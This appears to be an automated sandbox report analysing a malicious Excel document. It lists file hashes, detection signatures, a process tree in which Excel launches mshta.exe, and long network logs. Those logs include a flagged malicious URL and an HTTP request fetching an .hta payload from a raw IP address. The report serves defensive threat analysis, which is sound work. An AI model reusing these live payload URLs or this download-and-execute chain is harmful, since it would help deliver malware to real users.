Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Document.xla.xlsx

Overview

General Information

Sample name:Document.xla.xlsx
Analysis ID:1576236
MD5:d4c6ac821c22be30144711786c736a1a
SHA1:96e697734dd3dcc47ebbe6bb9d3f1055f096c4f7
SHA256:ab5152794ca45d670ae3f13de6be92fb686c27705d2df9ce0c00f76717bc61f3
Tags:xlaxlsxuser-abuse_ch
Infos:

Detection

Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Machine Learning detection for sample
Microsoft Office drops suspicious files
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: Suspicious Microsoft Office Child Process
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Document misses a certain OLE stream usually present in this Microsoft Office document type
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections
Unable to load, office file is protected or invalid
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64
  • EXCEL.EXE (PID: 7600 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 4A871771235598812032C822E6F68F19)
    • mshta.exe (PID: 7308 cmdline: C:\Windows\SysWOW64\mshta.exe -Embedding MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • splwow64.exe (PID: 7200 cmdline: C:\Windows\splwow64.exe 12288 MD5: 77DE7761B037061C7C112FD3C5B91E73)
  • EXCEL.EXE (PID: 5768 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\Document.xla.xlsx" MD5: 4A871771235598812032C822E6F68F19)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: File createdAuthor: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, ProcessId: 7600, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\createdbetterthingswithgreatnressgivenmebackwithnice[1].hta
Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\SysWOW64\mshta.exe -Embedding, CommandLine: C:\Windows\SysWOW64\mshta.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\SysWOW64\mshta.exe, NewProcessName: C:\Windows\SysWOW64\mshta.exe, OriginalFileName: C:\Windows\SysWOW64\mshta.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, ParentProcessId: 7600, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\SysWOW64\mshta.exe -Embedding, ProcessId: 7308, ProcessName: mshta.exe
Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 170.82.174.30, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 7600, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49826
Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.5, DestinationIsIpv6: false, DestinationPort: 49826, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 7600, Protocol: tcp, SourceIp: 170.82.174.30, SourceIsIpv6: false, SourcePort: 443
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://curt.wiz.co/VvBBUAl9Ti?&compulsion=zealous&moodAvira URL Cloud: Label: malware
Source: https://curt.wiz.co/VvBBUAl9Ti?&compulsion=zealous&mood2Avira URL Cloud: Label: malware
Source: Document.xla.xlsxReversingLabs: Detection: 21%
Source: Document.xla.xlsxJoe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
Source: unknownHTTPS traffic detected: 170.82.174.30:443 -> 192.168.2.5:49826 version: TLS 1.2

Software Vulnerabilities

barindex
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\mshta.exe
Source: global trafficDNS query: name: curt.wiz.co
Source: global trafficTCP traffic: 192.168.2.5:49826 -> 170.82.174.30:443
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 192.168.2.5:49826 -> 170.82.174.30:443
Source: global trafficTCP traffic: 192.168.2.5:49826 -> 170.82.174.30:443
Source: global trafficTCP traffic: 192.168.2.5:49826 -> 170.82.174.30:443
Source: global trafficTCP traffic: 192.168.2.5:49826 -> 170.82.174.30:443
Source: global trafficTCP traffic: 192.168.2.5:49826 -> 170.82.174.30:443
Source: global trafficTCP traffic: 192.168.2.5:49826 -> 170.82.174.30:443
Source: global trafficTCP traffic: 192.168.2.5:49826 -> 170.82.174.30:443
Source: global trafficTCP traffic: 192.168.2.5:49826 -> 170.82.174.30:443
Source: global trafficTCP traffic: 192.168.2.5:49826 -> 170.82.174.30:443
Source: global trafficTCP traffic: 192.168.2.5:49826 -> 170.82.174.30:443
Source: global trafficTCP traffic: 192.168.2.5:49826 -> 170.82.174.30:443
Source: global trafficTCP traffic: 170.82.174.30:443 -> 192.168.2.5:49826
Source: global trafficTCP traffic: 192.168.2.5:49826 -> 170.82.174.30:443
Source: global trafficTCP traffic: 192.168.2.5:49826 -> 170.82.174.30:443
Source: global trafficTCP traffic: 170.82.174.30:443 -> 192.168.2.5:49826
Source: global trafficTCP traffic: 170.82.174.30:443 -> 192.168.2.5:49826
Source: global trafficTCP traffic: 192.168.2.5:49826 -> 170.82.174.30:443
Source: global trafficTCP traffic: 192.168.2.5:49826 -> 170.82.174.30:443
Source: global trafficTCP traffic: 170.82.174.30:443 -> 192.168.2.5:49826
Source: global trafficTCP traffic: 170.82.174.30:443 -> 192.168.2.5:49826
Source: global trafficTCP traffic: 192.168.2.5:49826 -> 170.82.174.30:443
Source: global trafficTCP traffic: 192.168.2.5:49826 -> 170.82.174.30:443
Source: global trafficTCP traffic: 170.82.174.30:443 -> 192.168.2.5:49826
Source: global trafficTCP traffic: 170.82.174.30:443 -> 192.168.2.5:49826
Source: global trafficTCP traffic: 170.82.174.30:443 -> 192.168.2.5:49826
Source: global trafficTCP traffic: 192.168.2.5:49826 -> 170.82.174.30:443
Source: global trafficTCP traffic: 192.168.2.5:49826 -> 170.82.174.30:443
Source: global trafficTCP traffic: 192.168.2.5:49826 -> 170.82.174.30:443
Source: global trafficTCP traffic: 170.82.174.30:443 -> 192.168.2.5:49826
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.5:49833
Source: global trafficTCP traffic: 192.168.2.5:49833 -> 172.245.123.12:80
Source: excel.exeMemory has grown: Private usage: 2MB later: 76MB
Source: Joe Sandbox ViewIP Address: 170.82.174.30 170.82.174.30
Source: Joe Sandbox ViewIP Address: 170.82.174.30 170.82.174.30
Source: Joe Sandbox ViewJA3 fingerprint: 6271f898ce5be7dd52b0fc260d0662b3
Source: global trafficHTTP traffic detected: GET /VvBBUAl9Ti?&compulsion=zealous&mood HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: curt.wiz.coConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /233/eec/createdbetterthingswithgreatnressgivenmebackwithnice.hta HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
